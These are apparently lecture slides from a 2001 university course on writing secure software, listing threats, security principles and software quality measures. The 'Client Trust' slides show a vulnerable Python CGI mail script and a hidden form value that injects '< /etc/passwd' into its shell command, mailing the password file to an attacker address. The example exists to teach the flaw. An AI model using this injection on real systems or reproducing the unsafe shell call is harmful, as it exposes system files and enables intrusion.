Writing Secure Software

David A. Mundie
Professor
Software Engineering Institute

Spring 2001

95-755

Preliminaries


Is there a problem?


Why Software Security is Hard


Penetrate and Patch is Bad


Environment is Important


Threats to Software


1. Flooding


2. Replay


3. Trusting Untrustworthy Information


4. Reliance on External Systems


5. Naming Conflicts


6. Unexpected Quantity of Data


7. Debugging Modes


8. Loss of Control During Software Changes


9. Inadequate Testing


10. Physical Security


Outline


Risk: Random Number Generation


Guessing the Seed


Risk: Buffer Overflow


Risk: Client Trust

#!/usr/local/bin/python
import cgi, os
print "Content-type: text/html"; print
form = cgi.FieldStorage()
message = form["contents"].value
recipient = form["to"].value
tmpfile = open("/tmp/cgi-mail", "w")
tmpfile.write(message)
tmpfile.close()
os.system("/bin/mail " + recipient + " < /tmp/cgi-mail")
os.unlink("/tmp/cgi-mail")
print "<html><h3>Message sent.</h3></html>"

Client Trust Cont'd

<form 
action="http://www.list.org/send-mail.py 
method="post">
<h3>Edit Message</h3>
<input type="text" name="contents"/>
<input type="hidden" name="to"
value="attacker@somedomain.com < /etc/passwd #">
<input type="submit" value="Submit">
</form>

Client Trust Cont'd

/bin/mail attacker@somedomain.com
			< /etc/passwd # < /tmp/cgi-mail

Risk: Authentication


Types of Authentication


Guiding Principle #1

Identify and secure the weakest link


Guiding Principle #2

Provide defense in depth


Guiding Principle #3

Be reluctant to trust


Guiding Principle #4

It is hard to hide secrets


Guiding Principle #5

Principle of Least Privilege


Guiding Principle #6

Fail and recover gracefully


Guiding Principle #7

Compartmentalize your system


Guiding Principle #8

KISS - keep it simple, stupid


Guiding Principle #9

Don't help potential attackers, deter them


Guiding Principle #10

Always question anything related to security


Some Terms


Process Definition


A Classic Tradeoff

Security vs. Functionality


Security as Risk Management

There is no such thing as totally secure

Spiral model works here too

All sound software engineering principles apply


Some Principles


Security and Project Planning


Security and Software Architecture


Create Security Guidelines


But: Guidelines No Panacea


Open Code vs. Closed Code


Security Analysis


Need-Satisfaction Measures

  1. Effectiveness
    • Necessary
    • Sufficient
  2. Responsiveness
  3. Correctness
    • Completeness
    • Consistency
    • Traceability
    • Provably correct
  4. Verifiability
    • Testability

Performance Measures

  1. Dependability
    • Availability
    • Reliability (accuracy)
    • Safety
    • Trustworthiness (vulnerability + accountability)
    • Security
  2. Efficiency/Resource Utilization
    • Capacity
    • Latency
    • Throughput
  3. Usability
    • Error-proneness
    • Operability
  4. Fidelity

Maintenance Measures

  1. Maintainability
    • Modifiability
    • Adaptability
    • Evolvability
    • Extensibility
  2. Understandability
    • Complexity
    • Simplicity
    • Structuredness
    • Readability (self-descriptive, concise)

Adaptive Measures

  1. Interoperability
  2. Portability
  3. Scalability
  4. Reusability

Organizational Measures

  1. Cost of ownership
    • Cost of operation
    • Cost of maintenance
    • Lifetime of Operational Capability
  2. Productivity